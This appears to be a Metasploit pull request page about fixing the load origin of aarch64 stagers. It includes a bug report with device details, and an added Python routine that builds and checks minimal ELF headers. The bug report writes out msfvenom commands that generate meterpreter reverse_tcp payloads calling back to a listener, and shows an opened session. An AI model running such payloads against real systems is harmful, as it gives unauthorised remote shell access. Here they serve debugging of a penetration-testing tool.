set the org to be 0x400000 #16570
Before

After

To highlight the changes, here is a diff the

And the binary template file
Release Notes

This fixes a bug in the generation of aarch64 stagers so that, when the stage is received and written to memory, the stage can execute in a lower-privileged process.
Hi @bwatters-r7 ,

```
msf6 exploit(multi/handler) > version
Framework: 6.3.10-dev
Console : 6.3.10-dev
```

```
# uname -a
Linux cerberus 5.15.44-Re4son-v8l+ #1 SMP PREEMPT Debian kali-pi (2022-07-03) aarch64 GNU/Linux
# lscpu
Architecture: aarch64
CPU op-mode(s): 32-bit, 64-bit
Byte Order: Little Endian
CPU(s): 4
On-line CPU(s) list: 0-3
Vendor ID: ARM
Model name: Cortex-A72
Model: 3
Thread(s) per core: 1
Core(s) per cluster: 4
Socket(s): -
Cluster(s): 1
Stepping: r0p3
CPU(s) scaling MHz: 67%
CPU max MHz: 1500.0000
CPU min MHz: 600.0000
BogoMIPS: 108.00
Flags: fp asimd evtstrm crc32 cpuid
Caches (sum of all):
L1d: 128 KiB (4 instances)
L1i: 192 KiB (4 instances)
L2: 1 MiB (1 instance)
Vulnerabilities:
Itlb multihit: Not affected
L1tf: Not affected
Mds: Not affected
Meltdown: Not affected
Spec store bypass: Vulnerable
Spectre v1: Mitigation; __user pointer sanitization
Spectre v2: Vulnerable
Srbds: Not affected
Tsx async abort: Not affected
```

Stageless payloads are working fine but staged payloads are failing with an

```
# msfvenom -p linux/aarch64/meterpreter/reverse_tcp LHOST=192.168.201.10 LPORT=4444 -f elf -o aarch64-staged
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: aarch64 from the payload
No encoder specified, outputting raw payload
Payload size: 212 bytes
Final size of elf file: 332 bytes
Saved as: aarch64-staged
# file aarch64-staged
aarch64-staged: ELF 64-bit LSB executable, ARM aarch64, invalid version (SYSV), statically linked, no section header
# chmod +x aarch64-staged
# ./aarch64-staged
Illegal instruction
```

```
msf6 exploit(multi/handler) >
[*] Transmitting intermediate midstager...(256 bytes)
[*] Sending stage (949364 bytes) to 192.168.201.10
[-] Meterpreter session 12 is not valid and will be closed
[*] - Meterpreter session 12 closed.
```

```
# msfvenom -p linux/aarch64/meterpreter_reverse_tcp LHOST=192.168.201.10 LPORT=4444 -f elf -o aarch64-stageless
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: aarch64 from the payload
No encoder specified, outputting raw payload
Payload size: 1136368 bytes
Final size of elf file: 1136368 bytes
Saved as: aarch64-stageless
# file aarch64-stageless
aarch64-stageless: ELF 64-bit LSB pie executable, ARM aarch64, version 1 (SYSV), static-pie linked, with debug_info, not stripped
# chmod +x aarch64-stageless
# ./aarch64-stageless
```

```
msf6 exploit(multi/handler) >
[*] Meterpreter session 13 opened (192.168.201.10:4444 -> 192.168.201.10:42052) at 2023-05-16 20:43:14 +0000
```

Interesting observation is that the command

```
# readelf -a ./aarch64-staged
ELF Header:
Magic: 7f 45 4c 46 02 01 01 00 00 00 00 00 00 00 00 00
Class: ELF64
Data: 2's complement, little endian
Version: 1 (current)
OS/ABI: UNIX - System V
ABI Version: 0
Type: EXEC (Executable file)
Machine: AArch64
Version: 0x0
Entry point address: 0x400078
Start of program headers: 64 (bytes into file)
Start of section headers: 0 (bytes into file)
Flags: 0x0
Size of this header: 64 (bytes)
Size of program headers: 56 (bytes)
Number of program headers: 1
Size of section headers: 0 (bytes)
Number of section headers: 0
Section header string table index: 0
```
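The readelf output in the comment above shows the shape of the generated stager: a 64-byte ELF64 header, one 56-byte program header, no section headers, and an entry point of 0x400078, which is 0x400000 plus the two headers. Position-dependent code assembled for a fixed origin (the `org` in the PR title) only runs correctly if the loader maps it at that origin, so a cheap sanity check on a generated stager is to parse the headers and confirm that the PT_LOAD segment's p_vaddr matches the origin the code was assembled for. The following Python is an added example written for this page, not code from metasploit-framework: it builds a constructed single-segment ELF64 with the same header layout, parses it back, and checks the entry point against an expected origin. The 212-byte body is a placeholder of zero bytes, chosen so the file size comes out at the 332 bytes msfvenom reported above; `build_minimal_elf`, `parse_elf` and `check_load_address` are names chosen here.

```python
import struct

# Standard ELF64 constants (values from the ELF specification).
ELF_MAGIC = b"\x7fELF"
ELFCLASS64 = 2
ELFDATA2LSB = 1
ET_EXEC = 2
EM_AARCH64 = 183
PT_LOAD = 1
PF_X, PF_W, PF_R = 1, 2, 4

EHDR_SIZE, PHDR_SIZE = 64, 56
# Elf64_Ehdr and Elf64_Phdr field layouts: little endian, no padding.
EHDR_FMT = "<16sHHIQQQIHHHHHH"
PHDR_FMT = "<IIQQQQQQ"


def build_minimal_elf(code: bytes, org: int, machine: int = EM_AARCH64) -> bytes:
    """Constructed ELF64 executable in the layout readelf reported above:
    ELF header, one PT_LOAD program header, no section headers, then the
    code. The single segment maps the whole file at `org`, so the entry
    point is org + 64 + 56 = org + 0x78."""
    e_ident = ELF_MAGIC + bytes([ELFCLASS64, ELFDATA2LSB, 1, 0]) + b"\x00" * 8
    total = EHDR_SIZE + PHDR_SIZE + len(code)
    entry = org + EHDR_SIZE + PHDR_SIZE
    ehdr = struct.pack(EHDR_FMT, e_ident, ET_EXEC, machine, 1, entry,
                       EHDR_SIZE,                # e_phoff: phdr right after this header
                       0,                        # e_shoff: no section headers
                       0,                        # e_flags
                       EHDR_SIZE, PHDR_SIZE, 1,  # e_ehsize, e_phentsize, e_phnum
                       0, 0, 0)                  # e_shentsize, e_shnum, e_shstrndx
    phdr = struct.pack(PHDR_FMT, PT_LOAD, PF_R | PF_W | PF_X,
                       0,                        # p_offset: segment starts at file offset 0
                       org, org,                 # p_vaddr, p_paddr
                       total, total,             # p_filesz, p_memsz
                       0x10000)                  # p_align
    return ehdr + phdr + code


def parse_elf(data: bytes) -> dict:
    """Parse the ELF64 header and program headers (section headers are
    ignored; the stager has none)."""
    if len(data) < EHDR_SIZE or data[:4] != ELF_MAGIC:
        raise ValueError("not an ELF file")
    if data[4] != ELFCLASS64 or data[5] != ELFDATA2LSB:
        raise ValueError("only little-endian ELF64 is handled")
    f = struct.unpack_from(EHDR_FMT, data, 0)
    hdr = {"type": f[1], "machine": f[2], "entry": f[4], "phoff": f[5],
           "shoff": f[6], "ehsize": f[8], "phentsize": f[9], "phnum": f[10],
           "shnum": f[12], "phdrs": []}
    for i in range(hdr["phnum"]):
        off = hdr["phoff"] + i * hdr["phentsize"]
        if off + PHDR_SIZE > len(data):
            raise ValueError("program header table runs past end of file")
        p = struct.unpack_from(PHDR_FMT, data, off)
        hdr["phdrs"].append({"type": p[0], "flags": p[1], "offset": p[2],
                             "vaddr": p[3], "filesz": p[5], "memsz": p[6]})
    return hdr


def check_load_address(data: bytes, expected_org: int) -> dict:
    """Check that the entry point lies in an executable PT_LOAD segment and
    that the segment is mapped at the origin the code was assembled for.
    Code assembled with `org X` embeds absolute addresses that are only
    valid when the loader maps it at X."""
    elf = parse_elf(data)
    seg = next((p for p in elf["phdrs"]
                if p["type"] == PT_LOAD
                and p["vaddr"] <= elf["entry"] < p["vaddr"] + p["memsz"]), None)
    if seg is None:
        return {"ok": False, "entry": elf["entry"],
                "problems": ["entry point is not inside any PT_LOAD segment"]}
    problems = []
    if seg["vaddr"] != expected_org:
        problems.append("segment mapped at %#x but code assembled for %#x"
                        % (seg["vaddr"], expected_org))
    if not seg["flags"] & PF_X:
        problems.append("segment containing the entry point is not executable")
    if elf["machine"] != EM_AARCH64:
        problems.append("e_machine %d is not AArch64 (%d)" % (elf["machine"], EM_AARCH64))
    return {"ok": not problems, "problems": problems, "entry": elf["entry"],
            "load_base": seg["vaddr"],
            "entry_file_offset": seg["offset"] + (elf["entry"] - seg["vaddr"])}


if __name__ == "__main__":
    # Constructed sample: 212 zero bytes stand in for the stager body, giving
    # the same 332-byte file size msfvenom reported above.
    body = b"\x00" * 212
    good = build_minimal_elf(body, 0x400000)
    print(len(good), check_load_address(good, 0x400000))
    # Same body, but mapped at a different origin than it was assembled for.
    bad = build_minimal_elf(body, 0x10000)
    print(check_load_address(bad, 0x400000))
```

Run against a real stager file, `check_load_address(open(path, "rb").read(), 0x400000)` reports the load base, the entry point and its file offset, and any mismatch between the segment address and the origin the code expects; the `file` and `readelf` output in the comment above can be cross-checked against the parsed fields.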
try to fix #16562